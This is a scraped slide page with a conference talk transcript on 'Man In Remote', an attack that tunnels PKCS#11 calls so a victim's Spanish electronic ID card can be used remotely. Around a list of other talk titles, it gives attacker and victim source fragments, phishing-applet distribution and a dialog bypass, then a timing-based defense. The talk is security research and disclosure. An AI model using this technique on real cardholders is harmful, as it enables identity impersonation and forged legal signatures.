HES2011 - James Oakley and Sergey bratus-Exploiting-the-Hard-Working-DWARFHES2011 - James Oakley and Sergey bratus-Exploiting-the-Hard-Working-DWARF
HES2011 - James Oakley and Sergey bratus-Exploiting-the-Hard-Working-DWARFHackito Ergo Sum
 
HES2011 - joernchen - Ruby on Rails from a Code Auditor Perspective
HES2011 - joernchen - Ruby on Rails from a Code Auditor PerspectiveHES2011 - joernchen - Ruby on Rails from a Code Auditor Perspective
HES2011 - joernchen - Ruby on Rails from a Code Auditor PerspectiveHackito Ergo Sum
 
HES2011 - Raould Chiesa - Hackers Cybercriminals from Wargames to the Undergr...
HES2011 - Raould Chiesa - Hackers Cybercriminals from Wargames to the Undergr...HES2011 - Raould Chiesa - Hackers Cybercriminals from Wargames to the Undergr...
HES2011 - Raould Chiesa - Hackers Cybercriminals from Wargames to the Undergr...Hackito Ergo Sum
 
HES2011 - Richard Johnson - A Castle Made of Sand Adobe Reader X Sandbox
HES2011 - Richard Johnson - A Castle Made of Sand Adobe Reader X SandboxHES2011 - Richard Johnson - A Castle Made of Sand Adobe Reader X Sandbox
HES2011 - Richard Johnson - A Castle Made of Sand Adobe Reader X SandboxHackito Ergo Sum
 
HES2011 - Tarjei Mandt – Kernel Pool Exploitation on Windows 7
HES2011 - Tarjei Mandt – Kernel Pool Exploitation on Windows 7HES2011 - Tarjei Mandt – Kernel Pool Exploitation on Windows 7
HES2011 - Tarjei Mandt – Kernel Pool Exploitation on Windows 7Hackito Ergo Sum
 
HES2011 - Yuval Vadim Polevoy – Money Is In The Eye Of The Beholder: New And ...
HES2011 - Yuval Vadim Polevoy – Money Is In The Eye Of The Beholder: New And ...HES2011 - Yuval Vadim Polevoy – Money Is In The Eye Of The Beholder: New And ...
HES2011 - Yuval Vadim Polevoy – Money Is In The Eye Of The Beholder: New And ...Hackito Ergo Sum
 
HES2011 - Itzik Kolter - Let me Stuxnet You
HES2011 - Itzik Kolter - Let me Stuxnet YouHES2011 - Itzik Kolter - Let me Stuxnet You
HES2011 - Itzik Kolter - Let me Stuxnet YouHackito Ergo Sum
 

More from Hackito Ergo Sum (13)

HES 2011 - Gal Diskin - Binary instrumentation for hackers - Lightning-talk
HES 2011 - Gal Diskin - Binary instrumentation for hackers - Lightning-talkHES 2011 - Gal Diskin - Binary instrumentation for hackers - Lightning-talk
HES 2011 - Gal Diskin - Binary instrumentation for hackers - Lightning-talk
 
HES2011 - Jon Oberheide and Dan Rosenberg - Stackjacking
HES2011 - Jon Oberheide and Dan Rosenberg - StackjackingHES2011 - Jon Oberheide and Dan Rosenberg - Stackjacking
HES2011 - Jon Oberheide and Dan Rosenberg - Stackjacking
 
HES2011 - Sebastien Tricaud - Capture me if you can
HES2011 - Sebastien Tricaud - Capture me if you canHES2011 - Sebastien Tricaud - Capture me if you can
HES2011 - Sebastien Tricaud - Capture me if you can
 
HES2011 - Eloi Vanderbeken - Hackito Ergo Sum Crackme
HES2011 - Eloi Vanderbeken - Hackito Ergo Sum CrackmeHES2011 - Eloi Vanderbeken - Hackito Ergo Sum Crackme
HES2011 - Eloi Vanderbeken - Hackito Ergo Sum Crackme
 
HES2011 - Aaron Portnoy and Logan Brown - Black Box Auditing Adobe Shockwave
HES2011 - Aaron Portnoy and Logan Brown - Black Box Auditing Adobe ShockwaveHES2011 - Aaron Portnoy and Logan Brown - Black Box Auditing Adobe Shockwave
HES2011 - Aaron Portnoy and Logan Brown - Black Box Auditing Adobe Shockwave
 
HES2011 - Jon Larimer - Autorun Vulnerabilities on Linux
HES2011 - Jon Larimer - Autorun Vulnerabilities on LinuxHES2011 - Jon Larimer - Autorun Vulnerabilities on Linux
HES2011 - Jon Larimer - Autorun Vulnerabilities on Linux
 
HES2011 - James Oakley and Sergey bratus-Exploiting-the-Hard-Working-DWARF
HES2011 - James Oakley and Sergey bratus-Exploiting-the-Hard-Working-DWARFHES2011 - James Oakley and Sergey bratus-Exploiting-the-Hard-Working-DWARF
HES2011 - James Oakley and Sergey bratus-Exploiting-the-Hard-Working-DWARF
 
HES2011 - joernchen - Ruby on Rails from a Code Auditor Perspective
HES2011 - joernchen - Ruby on Rails from a Code Auditor PerspectiveHES2011 - joernchen - Ruby on Rails from a Code Auditor Perspective
HES2011 - joernchen - Ruby on Rails from a Code Auditor Perspective
 
HES2011 - Raould Chiesa - Hackers Cybercriminals from Wargames to the Undergr...
HES2011 - Raould Chiesa - Hackers Cybercriminals from Wargames to the Undergr...HES2011 - Raould Chiesa - Hackers Cybercriminals from Wargames to the Undergr...
HES2011 - Raould Chiesa - Hackers Cybercriminals from Wargames to the Undergr...
 
HES2011 - Richard Johnson - A Castle Made of Sand Adobe Reader X Sandbox
HES2011 - Richard Johnson - A Castle Made of Sand Adobe Reader X SandboxHES2011 - Richard Johnson - A Castle Made of Sand Adobe Reader X Sandbox
HES2011 - Richard Johnson - A Castle Made of Sand Adobe Reader X Sandbox
 
HES2011 - Tarjei Mandt – Kernel Pool Exploitation on Windows 7
HES2011 - Tarjei Mandt – Kernel Pool Exploitation on Windows 7HES2011 - Tarjei Mandt – Kernel Pool Exploitation on Windows 7
HES2011 - Tarjei Mandt – Kernel Pool Exploitation on Windows 7
 
HES2011 - Yuval Vadim Polevoy – Money Is In The Eye Of The Beholder: New And ...
HES2011 - Yuval Vadim Polevoy – Money Is In The Eye Of The Beholder: New And ...HES2011 - Yuval Vadim Polevoy – Money Is In The Eye Of The Beholder: New And ...
HES2011 - Yuval Vadim Polevoy – Money Is In The Eye Of The Beholder: New And ...
 
HES2011 - Itzik Kolter - Let me Stuxnet You
HES2011 - Itzik Kolter - Let me Stuxnet YouHES2011 - Itzik Kolter - Let me Stuxnet You
HES2011 - Itzik Kolter - Let me Stuxnet You
 

Recently uploaded

Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 

Recently uploaded (20)

Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector Databases
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 

Remotely use Spanish National Electronic ID with MiR

  • 1. Remotely Using the Spanish National Electronic ID
  • 2. ToC • Introduction to DNIe • Man In Remote • Live Demo! • MiR Reloaded • Solution
  • 3. Introduction • Law to promote online transactions • Administrative Tasks Online • Citizen-Friendliness #fail
  • 4. Introduction • General Purpose Microprocessor • CriptoChip • Serial Port Communication
  • 5. Introduction • Biometric System: Match On Card • Authentication Certificates • Non-Repudiation Certificates • Component Certificates
  • 6. Introduction • PC / SC – Integration of SmartCards with PCs – API for Communication – Multiplataform – Functionality • Initialization • Readers Management • State • Sending/Receiving Command (APDUs)
  • 7. Introduction • Secure Channel – UNE 14890 – APDUs are encrypted – Peers mutually authenticated • Public Key Exchange • Authentication • Channel’s Key Derivation
  • 8. Introduction • CSP Applications – Microsoft Propossal CSP PC / SC – CryptoAPI Extensions DNIe Reader
  • 9. Introduction • PKCS#11 – RSA standard Applications (http://www.rsa.com/rsalabs/node.asp?id=2133) – Generic API to access crypto- PKCS#11 devices – Token as access unit PC / SC – Manages Several Objects DNIe • Public, Private Keys Reader • Data & Certs
  • 10. Introduction • Authenticating Users in Web Services – Java Applet • Intrusive method – SSL + Client Certificate • “Transparent”
  • 11. Introduction • Java Applet – User needs to download an Applet – Annoying Security Warnings
  • 12. Introduction DNIe WebBrowser Web Server OCSP Init Session Get Client Cert Validate PIN Get Auth Cert Sign Msgs Validate Cert
  • 13. Introduction • Physhical Security – Power Sensors – Glitch Detection – Passivation Layer – Clock Frequency Changes Detection – Current Changes Detection • EAL4+ Level
  • 14. Man In Remote • Motivation • Definition • Description • Demo
  • 15. Man In Remote • Motivation – Systems using physical devices – Duplication – Remote Authentication
  • 16. Man In Remote • Definition Live usage of the functionalities provided by a security device when this is plugged into a different computer
  • 17. Man In Remote Web Browser PKCS#11
  • 18. Man In Remote Web Browser PKCS#11 PKCS#11 PKCS#11 Tunneling MiR MiR
  • 19. Man In Remote Web Browser PKCS#11 PKCS#11 PKCS#11 Tunneling MiR MiR
  • 20. Man In Remote • MiR - Attacker – Library interfacing with PKCS#11 – No Local Operations – Remote Object Interface
  • 21. Man In Remote • MiR - Attacker 1. Data Packaging 2. Method Invokation 3. Data Unpackaging
  • 22. Man In Remote • MiR - Victim – Client of the official PKCS#11 – Waits for Attaker’s Requests – Remote Object
  • 23. Man In Remote • MiR - Victim 1. Data Unpacking 2. Invoking Methods from the Official PKCS#11 3. Retrieve results and pack them back
  • 24. Man In Remote - Attacker’s Src CK_DEFINE_FUNCTION(CK_RV,C_Initialize)(…) { #ifdef _REMOTE_PKCS11_ { DataMarshalling *d = NULL; […] if (connect(client, (struct sockaddr *)&sock, sizeof(sock)) == SOCKET_ERROR) {[…]} d = new DataMarshalling(client); d->setMsgType("C_Initialize"); d->packInt((char *)&a); d->sendData(); delete d; }
  • 25. Man In Remote - Attacker’s Src #else InicializarFunciones("UsrPKCS11.dll"); rv = pFunctionList->C_Initialize(pInitArgs); #endif #ifdef _DEBUG_PKCS11_ fprintf(fout, "C_Initialize ret: %dn", rv); #endif exit: return rv; }
  • 26. Man In Remote - Attacker’s Src CK_DEFINE_FUNCTION(CK_RV,C_OpenSession)() { CK_RV rv = CKR_OK; DataMarshalling *d = new DataMarshalling(client); d->setMsgType("C_OpenSession"); { /* * Open session */ unsigned int sessionId = 0; DataMarshalling *d2 = new DataMarshalling(client); d->packInt((char *)&slotID); d->packInt((char *)&flags); d->sendData();
  • 27. Man In Remote - Attacker’s Src d2->recvData(); if (strcmp(d2->getMsgType(), d->getMsgType())) { rv = CKR_CANCEL; goto exit; } rv = d2->unpackInt(); sessionId = d2->unpackInt(); delete d2; *phSession = sessionId; } delete d; exit: return rv; }
  • 28. Man In Remote - Victim’s Src } else if (!strcmp(d->getMsgType(), "C_OpenSession")) { slotId = d->unpackInt(); flags = d->unpackInt(); { DataMarshalling *d2 = new DataMarshalling(client); /* * Opening session */ ret = C_OpenSession(slotId, flags, NULL, NULL, &sessionId); d2->setMsgType(d->getMsgType()); d2->packInt((char *)&ret); d2->packInt((char *)&sessionId); d2->sendData(); delete d2; } }
  • 29. Man In Remote - Live Demo! Social Security Web Browser PKCS#11 PKCS#11 PKCS#11 Tunneling MiR MiR
  • 30. Man In Remote • PKCS#11 Flow: Initialization C_Initialize C_OpenSession C_GetInfo C_GenerateRandom C_GetSlotList C_SeedRandom C_FindObjectsInit C_GetSlotList C_FindObjects C_GetSlotInfo C_FindObjectsFinal C_GetTokenInfo C_GetSlotInfo C_GetMechanismList C_GetSessionInfo C_GetMechanismList
  • 31. Man In Remote • PKCS#11 Flow: Login C_FindObjectsInit C_GetSessionInfo C_FindObjects C_GetSessionInfo C_FindObjectsFinal C_FindObjectsInit C_FindObjects C_GetSlotInfo C_FindObjectsFinal C_GetSessionInfo C_GetSlotInfo C_Login C_GetAttributeValue C_GetSlotInfo C_GetAttributeValue C_GetSessionInfo C_GetSessionInfo
  • 32. Man In Remote • PKCS#11 Flow: Signing C_SignInit C_Sign C_GetSlotInfo C_CloseSession C_GetSessionInfo C_GetSlotInfo C_GetSessionInfo
  • 33. Man In Remote • Dialog when using non-Repudiation Cert
  • 34. Man In Remote • Bypassing the dialog
  • 35. MiR Reloaded • Moving Victim’s part to a Java Applet • Security Warning
  • 36. MiR Reloaded • Java Version – Sun PKCS#11 – Easy distribution as Phishing Attack – iframe + applet
  • 37. MiR Reloaded • Till now we have achieve – Remote Authentication – Remote Signing – An Attacker with the PIN has full access to DNIe
  • 38. MiR Reloaded • Second method of Authentication: Applet – Token Signing – Signed Token Uploaded via POST – No need of PKCS#11 Tunneling – Send Token and Get it Signed
  • 39. MiR Reloaded Web Browser <form> <form> <input id=“token” <input id=“token” value=“AAAAAA”> value=“903234”> </form> </form>
  • 40. MiR Reloaded Web Browser <form> <input id=“token” 1 Token Phishing / value=“903234”> value=“AAAAAA”> Trojan </form> 2 Signed Token
  • 41. MiR: Solution • Complex Solution • We can’t trust the PC • Servers can’t do any extra check • Smart Cards are not so “smart”
  • 42. MiR: Solution • Based on Response Times • Fixed Processing Times • Network Latency • DNIe could abort a potential attack
  • 43. MiR: Solution t R1 t R2 t p ( R1 ) tlocal t R1 Local Processing t R2 t p ( R1 )
  • 44. MiR: Solution t R1 t R2 t p ( R1 ) tlocal 2t RTT t R1 tRTT Local Processing MiR tRTT t R2 t p ( R1 )
  • 45. MiR: Solution t R1 t R2 t p ( R1 ) tlocal t R1 t R2 t p ( R1 ) tlocal 2t RTT t R1 t R2 t R1 t R2
  • 46. MiR: “Is this real Life?” • Similar Attacks – http://www.itworld.com/security/134958/smart- cards-no-match-online-spies